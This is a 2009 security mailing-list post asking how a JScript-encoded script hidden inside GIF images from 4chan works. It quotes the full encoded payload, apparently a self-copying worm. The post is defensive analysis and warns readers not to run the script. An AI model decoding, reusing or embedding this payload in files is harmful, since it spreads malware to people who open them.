PaulDotCom mailing list archives
Obfuscated Javascript in a JSE in an Image
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sun, 8 Feb 2009 15:38:33 -0500
Thanks, that helps, but I'd love to know what they used to obfuscate this. I've seen a few schemes for obfuscate Javascript, and this one is the fugliest I've encountered. I don't even understand how it can run. On Sun, Feb 8, 2009 at 1:23 AM, Tim Mugherini <gbugbear at gmail.com> wrote:
Adrian Dshield posted about this today May want to check in with them On 2/7/09, Adrian Crenshaw <irongeek at irongeek.com> wrote:Ok, I found these images on 4chan that have encoded javascript in them,youhave to safe the gif as a jse to run them (but don't!!!, I'm justuploadingthe images to a forum so you can see what they are). Exactly how is this encoded, and can anyone tell what it does? This seems to be the scriptpart:GIF89aI = "x1!??"; #@~^pwkAAA==-mD~XtMP',x APzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@ #@&-lMPd4 VV~x,xnh,)1Yr7+or4N+1O`r jmMk2Oc?t sVr#i@#@&-lMP6/GPx~ +APz^Yb\np}4Ln^D`E?1.bwObxTRsbV jXkYn:}4%n1YJ*I@ #@&\lM~r+,',xnh~)1Yr\ pr(Ln^D`J(UD+.x OA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r?Ji@#@&dt V^R^E.. xOfb.+1YG.HP'~WkW o OUwn1kmVsKV9nDv bi@#@&d4 VVc.E `J1h[PJm,mGwz~'JEP3~ UC d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&J?Jp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-wbx[GS/-'/EMD+ O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv #,Q~J'-kXdR%d Jbi@#@&8,mCO1t`nb, N@#@&@#@&h4bV `F*PP~YMX~ @#@&@#@&,PP,atMRWanU`ro YE~~E4YOw=&zb:L WmtCUcW.oJ8JJS,!*i@#@&J?rI@#@&P~P,64.c/+D]+$E+kOu+mN DcJ(W HGNbWk NRjbxmnEBPU+S~GlO `Z##p@#@&~P,PatMRdn N`*I@ #@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@ #@&~P,P~P,Pa4MRWanxvJo OE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_' Rc#J#,FDS,!bi@#@&J?ri@#@&,PP~~,P~64.c/n Nv#i@#@&,~P,P~P,\C.,k:,xP +h,)^Yb\ (64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGN PxP2i@#@&,PP,~P,Pks OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D . /wKU/ AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL Lknr~~y#p@#@&r?Jp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L LknJ*i@#@&,PP~N,mCY14v+b, )@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO J~_,4[.HP_,E-M-x;GUY xDO9kd2K/rYbGx=PWGM:O[CDlIP Cs+xri@ #@&@#@&P,~P7l.Pal.O8P',W/KRWanUK 6DsrVncrXE~,+~,FbI@#@&J?EI@#@&~P,~al.DFchDbY ct l[P3PE./YKwD'x-MwUJ,_,wConslOm4cz@!/2C Pk[xrxGY4. l[v-9_#J#]qT,_~t l[~3PJ!20bV+p~Wk^+ lh+xCcor0'.- -.w J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY ,x~0kWcW2+UP 6Osbs+vJ"EBP S~8#I@#@&E?ri@#@&P,PPalMO ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GN wM-U'D'xD obdY'Dwx OE~3P49.X,_PrRR-M- Jbi@#@&,P~PaCDD ^^W/nc*i@ #@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Pxh,)mDk-+or8% mYvEb9WN( jYM+m:E#I@#@&J?Ei@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkOWa+ `bi@#@&,P~PaG/DRsGmNs.GssrV crwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso *1tlU KDLz(&r#I@#@&,PP,P,~P9W~ @#@&~~,PP,~P,PP, jCc/^+nwcqZ!bi@ #@&J?ri@#@&,PP~~,P~8,A4ks Pvk+cD CNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@ #@&P,P~~,PPrncNGm!hxOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@ #@&~,PP)~mmYm4cn#,)@#@&@#@&E?ri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5E dDCnmN D`rZKUY xOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+ NcwK/Obp@#@&@#@&P,PPqjuRkV +2`XTZ!T#p@ #@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@ If you wan to see the gifs in question, look at this post: http://www.binrev.com/forums/index.php?showtopic=40285&hl= Adrian-- Sent from my mobile device _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090208/5b9561ed/attachment.htm
Current thread:
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 07)
- Obfuscated Javascript in a JSE in an Image Tim Mugherini (Feb 07)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 08)
- Obfuscated Javascript in a JSE in an Image Alvaro (Feb 11)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 11)
- Obfuscated Javascript in a JSE in an Image PJ McGarvey (Feb 12)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 13)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 08)
- Obfuscated Javascript in a JSE in an Image Tim Mugherini (Feb 07)